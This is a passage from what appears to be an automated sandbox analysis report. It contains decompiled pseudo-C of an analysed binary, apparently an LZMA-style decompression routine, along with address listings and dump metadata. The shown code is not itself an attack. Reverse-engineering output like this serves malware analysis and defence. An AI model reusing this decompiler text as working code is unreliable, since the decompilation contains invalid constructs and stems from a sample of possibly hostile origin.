													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                  0x00000000
                                  0x00406fbb
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fcc
                                  0x00406fd6
                                  0x00000000
                                  0x00406fc1
                                  0x00406fc1
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00406ef5
                                  0x00406ef8
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x0040726d
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x00000000
                                  0x00000000
                                  0x004072bb
                                  0x004072bf
                                  0x0040746e
                                  0x00407484
                                  0x0040748c
                                  0x00407493
                                  0x00407495
                                  0x0040749c
                                  0x004074a0
                                  0x004074a0
                                  0x004072cb
                                  0x004072d2
                                  0x004072da
                                  0x004072dd
                                  0x004072e0
                                  0x004072e0
                                  0x004072e6
                                  0x004072e6
                                  0x00406a82
                                  0x00406a82
                                  0x00406a82
                                  0x00406a8b
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00000000
                                  0x00406a9c
                                  0x00000000
                                  0x00000000
                                  0x00406aa5
                                  0x00406aa8
                                  0x00406aab
                                  0x00406aaf
                                  0x00000000
                                  0x00000000
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406aba
                                  0x00406abb
                                  0x00406abe
                                  0x00406ac0
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac6
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad9
                                  0x00406aec
                                  0x00406aef
                                  0x00406afb
                                  0x00406b23
                                  0x00406b25
                                  0x00406b33
                                  0x00406b33
                                  0x00406b37
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b27
                                  0x00406b27
                                  0x00406b2a
                                  0x00406b2b
                                  0x00406b2b
                                  0x00000000
                                  0x00406b27
                                  0x00406b01
                                  0x00406b06
                                  0x00406b06
                                  0x00406b0f
                                  0x00406b17
                                  0x00406b1a
                                  0x00000000
                                  0x00406b20
                                  0x00406b20
                                  0x00000000
                                  0x00406b20
                                  0x00000000
                                  0x00406b3d
                                  0x00406b3d
                                  0x00406b41
                                  0x004073ed
                                  0x00000000
                                  0x004073ed
                                  0x00406b4a
                                  0x00406b5a
                                  0x00406b5d
                                  0x00406b60
                                  0x00406b60
                                  0x00406b60
                                  0x00406b63
                                  0x00406b67
                                  0x00000000
                                  0x00000000
                                  0x00406b69
                                  0x00406b6f
                                  0x00406b99
                                  0x00406b9f
                                  0x00406ba6
                                  0x00000000
                                  0x00406ba6
                                  0x00406b75
                                  0x00406b78
                                  0x00406b7d
                                  0x00406b7d
                                  0x00406b88
                                  0x00406b90
                                  0x00406b93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bd8
                                  0x00406bde
                                  0x00406be1
                                  0x00406bee
                                  0x00406bf6
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x00000000
                                  0x00406bad
                                  0x00406bad
                                  0x00406bb1
                                  0x004073fc
                                  0x00000000
                                  0x004073fc
                                  0x00406bbd
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bcb
                                  0x00406bce
                                  0x00406bd1
                                  0x00406bd6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bfe
                                  0x00406c00
                                  0x00406c03
                                  0x00406c74
                                  0x00406c77
                                  0x00406c7a
                                  0x00406c81
                                  0x00406c8b
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x00406c05
                                  0x00406c09
                                  0x00406c0c
                                  0x00406c0e
                                  0x00406c11
                                  0x00406c14
                                  0x00406c16
                                  0x00406c19
                                  0x00406c1b
                                  0x00406c20
                                  0x00406c23
                                  0x00406c26
                                  0x00406c2a
                                  0x00406c31
                                  0x00406c34
                                  0x00406c3b
                                  0x00406c3f
                                  0x00406c47
                                  0x00406c47
                                  0x00406c47
                                  0x00406c41
                                  0x00406c41
                                  0x00406c41
                                  0x00406c36
                                  0x00406c36
                                  0x00406c36
                                  0x00406c4b
                                  0x00406c4e
                                  0x00406c6c
                                  0x00406c6e
                                  0x00000000
                                  0x00406c50
                                  0x00406c50
                                  0x00406c53
                                  0x00406c56
                                  0x00406c59
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5e
                                  0x00406c61
                                  0x00406c63
                                  0x00406c64
                                  0x00406c67
                                  0x00000000
                                  0x00406c67
                                  0x00000000
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ebf
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecc
                                  0x00406ecf
                                  0x00406ed2
                                  0x00406ed5
                                  0x00406ed8
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee2
                                  0x00406ee4
                                  0x00406ee7
                                  0x00406eea
                                  0x00406eed
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ef2
                                  0x00406ea3
                                  0x00406ea6
                                  0x00406ea9
                                  0x00406eb3
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x00000000
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f2e
                                  0x00406f31
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f0d
                                  0x00406f10
                                  0x00406f13
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x00406f26
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x00000000
                                  0x00406f4a
                                  0x00406f4e
                                  0x00000000
                                  0x00000000
                                  0x00406f54
                                  0x00406f58
                                  0x00000000
                                  0x00000000
                                  0x00406f5e
                                  0x00406f60
                                  0x00406f64
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x0040726a
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x00000000
                                  0x00407328
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x004072e6
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072ec
                                  0x004072e6
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x004072e6
                                  0x0040726d
                                  0x0040726a
                                  0x00000000
                                  0x00406fbf

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                  • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                                  • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                  • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E00406F07() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
